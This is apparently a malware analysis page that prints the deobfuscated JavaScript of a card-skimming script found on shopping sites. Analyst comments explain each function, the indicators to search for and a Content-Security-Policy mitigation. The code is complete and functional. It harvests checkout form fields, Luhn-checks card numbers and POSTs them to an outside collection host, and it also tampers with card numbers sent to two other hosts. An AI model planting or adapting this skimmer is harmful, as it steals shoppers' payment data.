Malware from onlineclouds.cloud, deobfuscated
// Analyst note: entry point of the sample. 100 ms after the script is
// evaluated it calls checkForCheckout once.
setTimeout(checkForCheckout, 100); | |
// Shared buffer that createQueryString appends harvested form data to and
// scrapeAllFields reads and resets; null means "nothing collected yet".
var snd = null; | |
// Gate: start scraping only when the current URL looks like a checkout page.
// window.location is coerced to a string and tested (case-sensitively) against
// a list of checkout-related path keywords. On any other page the script does
// nothing further, which limits how often the skimmer is visible.
// Detection: this keyword alternation is a stable string to search for when
// scanning a store's served JavaScript for this sample.
function checkForCheckout() { | |
if ((/onepage|firecheckout|Checkout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm|fancycheckout/).test(window.location)) { | |
scrapeAllFields(); | |
} | |
} | |
// Event handler (registered by scrapeAllFields on click and submit) that
// collects the current value of every form control on the page and appends
// it to the global `snd` as "name=value&" pairs.
// Only values between 1 and 59 characters long are collected.
// Values are concatenated without URL-encoding.
function createQueryString() { | |
var inp = document.querySelectorAll("input, select, textarea, checkbox"); | |
for (var i = 0; i < inp.length; i++) { | |
if (inp[i].value.length > 0 && inp[i].value.length < 60) { | |
// nme falls back to the element index for unnamed fields, but it is not
// used below: the concatenation reads inp[i].name directly.
var nme = inp[i].name; | |
if (nme == "") { | |
nme = i; | |
} | |
// snd starts as null, so the first += coerces it to the string "null".
snd += inp[i].name + "=" + inp[i].value + '&'; | |
} | |
} | |
} | |
// Luhn checksum test: returns true when the digits in `s` form a number that
// passes the Luhn (mod 10) check used by payment card numbers.
// The sample uses it to discard digit runs that are not plausible card
// numbers before sending anything out.
// Note: i, x, j, k, m, c and a are assigned without declaration, so in
// non-strict code they become globals.
function isValidCard(s) { | |
var v = "0123456789"; | |
var w = ""; | |
// Keep only the decimal digits of s in w.
for (i = 0; i < s.length; i++) { | |
x = s.charAt(i); | |
if (v.indexOf(x, 0) != -1) w += x; | |
} | |
// k = number of digits to double; m = 1 when the digit count is odd, else 0,
// so that doubling starts from the second-to-last digit.
j = w.length / 2; | |
k = Math.floor(j); | |
m = Math.ceil(j) - k; | |
c = 0; | |
// Doubled positions: a two-digit product contributes the sum of its digits.
for (i = 0; i < k; i++) { | |
a = w.charAt(i * 2 + m) * 2; | |
c += a > 9 ? Math.floor(a / 10 + a % 10) : a; | |
} | |
// Remaining positions are added unchanged.
for (i = 0; i < k + m; i++) c += w.charAt(i * 2 + 1 - m) * 1; | |
return (c % 10 == 0); | |
} | |
// Main loop of the skimmer. Each pass:
//   1. hooks createQueryString onto click events of button-like elements and
//      onto submit events of every form;
//   2. if createQueryString has filled `snd`, looks for a card-number-like
//      digit run in it and, when one passes the Luhn check, sends the whole
//      buffer to the collection endpoint;
//   3. clears `snd` and reschedules itself 150 ms later.
// Indicators on this page: the POST URL below, the literal "card_123=" and
// "shop=" parameter names, and the "data=...&token=..." body layout.
// Mitigation: a Content-Security-Policy with a restrictive connect-src would
// block the XMLHttpRequest to the third-party host. Monitoring outbound
// requests from checkout pages would reveal it.
function scrapeAllFields() { | |
var btn = document.querySelectorAll(`a[href*='javascript:void0'],a[href='#'],button, input, submit, .btn, .button`); | |
for (var i = 0; i < btn.length; i++) { | |
var b = btn[i]; | |
// "slect" is typo here -- WdG
// Skip plain data-entry controls; only clickable elements get the hook.
if (b.type != "text" && b.type != 'slect' && b.type != "checkbox" && b.type != 'password' && b.type != "radio") { | |
// attachEvent is the fallback for old Internet Explorer.
if (b.addEventListener) { | |
b.addEventListener('click', createQueryString, false); | |
} else { | |
b.attachEvent('onclick', createQueryString); | |
} | |
} | |
} | |
var frm = document.querySelectorAll('form'); | |
for (var i = 0; i < frm.length; i++) { | |
if (frm[i].addEventListener) { | |
frm[i].addEventListener('submit', createQueryString, false); | |
} else { | |
frm[i].attachEvent('onsubmit', createQueryString); | |
} | |
} | |
if (snd != null) { | |
// A digit 3-6 followed by 13 to 16 more digits (14-17 digits in total).
// Only the first match is used.
var regexp = /(3|4|5|6)[0-9]{13,16}/gi; | |
var matches = snd.match(regexp); | |
if (matches != null) { | |
if (isValidCard(matches[0]) == true) { | |
// The captured form data gets a hard-coded shop= value and the matched
// number appended, then the whole string is obfuscated.
snd = encodeAllTheThings(snd + "&shop=www.google.nl&card_123=" + matches[0]); | |
var http = new XMLHttpRequest(); | |
// Exfiltration: asynchronous cross-origin POST to the collection host.
http.open("POST", "https://www.onlineclouds.cloud/api/v1/", true); | |
http.setRequestHeader('Content-type', "application/x-www-form-urlencoded"); | |
http.withCredentials = true; | |
// token carries the obfuscated hostname of the page the script ran on.
http.send("data=" + snd + '&token=' + encodeAllTheThings(window.location.host)); | |
} | |
} | |
} | |
// The buffer is cleared on every pass, whether or not anything was sent.
snd = null; | |
setTimeout(scrapeAllFields, 150); | |
} | |
// Obfuscates a string before it is sent. For every input character a random
// integer rnd in the range 68..190 is chosen and two code units are emitted:
// (charCode + rnd) followed by rnd. The output is therefore twice as long as
// the input and differs on every call.
// This is reversible without any key: each original character is the first
// code unit of a pair minus the second. Responders can use that to decode
// captured request bodies and establish what data left the site.
// Note: output, Temp, Temp2, TextSize, i and rnd are assigned without
// declaration, so in non-strict code they become globals.
function encodeAllTheThings(theText) { | |
output = new String; | |
Temp = new Array(); | |
Temp2 = new Array(); | |
TextSize = theText.length; | |
// First pass: pick the per-character offset and store the shifted code.
for (i = 0; i < TextSize; i++) { | |
rnd = Math.round(Math.random() * 122) + 68; | |
Temp[i] = theText.charCodeAt(i) + rnd; | |
Temp2[i] = rnd; | |
} | |
// Second pass: interleave shifted code and offset into the output string.
for (i = 0; i < TextSize; i++) { | |
output += String.fromCharCode(Temp[i], Temp2[i]); | |
} | |
return output; | |
}; | |
// Second function in the sample: a global jQuery beforeSend hook.
// It runs before every jQuery AJAX request on the page. When the request URL
// contains "js-react.com" or "bootstrap-js.com", it logs the URL and, if the
// request data contains a run of 13-16 digits, replaces every such run with
// the first match whose last digit has been swapped for a random digit 0-9.
// Requests to those two hosts therefore carry an altered number.
// NOTE(review): presumably those hosts are other collection endpoints whose
// data this sample tampers with. The page does not establish that.
// NOTE(review): assumes settings.data is a string. A non-string value would
// make .match/.replace throw. Confirm against real traffic.
jQuery.ajaxSetup({ | |
beforeSend: function(jqXHR, settings) { | |
if (settings.url.indexOf("js-react.com") !== -1 || settings.url.indexOf('bootstrap-js.com') !== -1) { | |
console.log(settings.url); | |
// Replacement for the final digit; it may equal the original digit.
var myRandom = Math.floor(Math.random() * 10); | |
var cc = new RegExp("[0-9]{13,16}"); | |
if (cc.test(settings.data)) { | |
var old_cc = settings.data.match(cc); | |
// All digit runs are replaced with the same value derived from the first.
var new_data = settings.data.replace(new RegExp("[0-9]{13,16}", 'g'), old_cc[0].slice(0, -1) + myRandom); | |
settings.data = new_data; | |
} | |
} | |
} | |
}); |